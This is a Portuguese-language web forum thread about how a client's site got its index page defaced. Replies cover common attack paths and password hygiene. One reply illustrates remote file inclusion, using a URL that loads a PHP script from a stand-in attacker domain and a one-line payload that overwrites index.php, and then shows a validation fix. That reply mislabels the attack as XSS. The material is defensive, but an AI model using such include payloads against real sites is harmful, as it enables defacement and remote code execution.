Segurança;

[borsatti 2]

Gente, gostaria de saber algumas formas que se é capaz de invadir um site, pois invadiram um de meu cliente, e alteraram o index, agora nao sei se alteraram ele ou se apagaram e colocaram outro. eu gostaria de saber algumas formas disso acontecer para eu tentar evitar novas invasões. Obrigado. se alguem quiser saber o endereço do site. me peça por pm pois nao posso posta-lo aqui!

[Ederjsantos 0]

existem varias formas de invasão a mais comum é por sql inject,

dentre várias, é complicado dizer lhe como pode ter acontecido isso,

são inúmeras formas de burlar a segurança de um hosting.

 

Mas pra mudar a index o cara teve que ter acesso ftp para alterar a index

nao tem log no seu site nao??

[Will Fernando 2]

as 3 mais comun praticas de burlar os sites sao o famoso Sql Inject, XSS e Paths mas neste caso em especifico se so alterou o index creio que nao seja falha no site mas sim um virus que a um tempin atras tava "pegando geral" .. ele so altera os arquivos que tem no nome "index" =] da uma pesquisada nos topicos de algums meses atras aqui no IM que você vai achar mais informações :)

 

valww

[lucasmartins 6]

Vixe, as vezes isso pode ter sido feito por um vírus, um concorrente ou um ex-freela do seu cliente que ficou bravo com ele e descontou zuando o site dele.

 

Hheuheuhue, pode parecer brincadeira, mas essas coisas acontecem.

 

Acredito que a melhor forma para se proteger disso é tomando cuidado com senhas, colocando senhas difíceis no FTP e no Painel Administrativo. Também se hospedando num host confiável (não recomendo locaweb), as vezes o serviço de hospedagem é tão fraca que não se preocupa muito com a segurança. Nunca confie naquelas hospedagem grátis.

 

E na minha opinião, senhas não se devem guardar em nenhum documento ou papel, ela deve ser guardada exclusivamente na memória do cerébro.

 

Em minhas senhas eu utilizo uma lógica muito difícil, mas se por acaso alguém conseguir descobrir uma delas, essa pessoa terá a mesma dificuldade para descobrir qualquer outra.

 

As pessoas só se preocupam em mudar as senhas e torná-las mais difíceis quando acontece alguma coisa... tsc tsc

 

Abraços

[João Batista Neto 448]

Mas pra mudar a index o cara teve que ter acesso ftp para alterar a index

 

Não necessariamente...

 

Se não houver verificações de segurança nas inclusões e o servidor estiver com allow_url_include é possível lançar um ataque XSS incluindo um arquivo PHP remotamente.

 

Exemplo prático para ilustrar:

 

O site utiliza o seguinte para definir suas páginas:

 

seudominio.com,br/?pag=home.php

 

Ao perceber isso, um usuário 'do mal' irá com certeza fazer o seguinte teste:

 

seudominio.com,br/?pag=http://dominiodomal.com/scriptdomal.php

 

Se allow_url_include estiver ativado, o arquivo scriptdomal.php será incluído e executado, mesmo estando em outro servidor

 

Supondo que o script do mal tenha o seguinte conteúdo:

 

file_put_contents( 'index.php' , 'Você foi hackeado !!!' );

 

Você perdeu sua index.php e sabe-se lá o que mais...

 

Para se prevenir desse tipo de ataque, você deve sempre verificar o que o usuário está enviando para você. NUNCA aceite nada do usuário sem verificar.

 

Verificando a requisição do usuário:

<?php
$incluir = null;

if ( isset( $_GET[ 'page' ] ) ){
$page = basename( $_GET[ 'page' ] ); //aqui removemos o http ou qualquer outro protocolo e usamos só o nome do arquivo

if ( is_file( $page ) && is_readable( $page ) ) $incluir =& $page; //Se o arquivo existir e tiver permissão para leitura, definimos para inclusão
} else $incluir = 'home.php'; //Aqui a página padrão, caso o usuário não tenha especificado nenhuma

if ( $incluir !== null ) include $incluir;
else {
echo 'Requisição inválida';
}

 

Resumindo, uma configuração falha do servidor unido com uma falha de verificação da entrada do usuário com certeza é problema na certa.

 

;)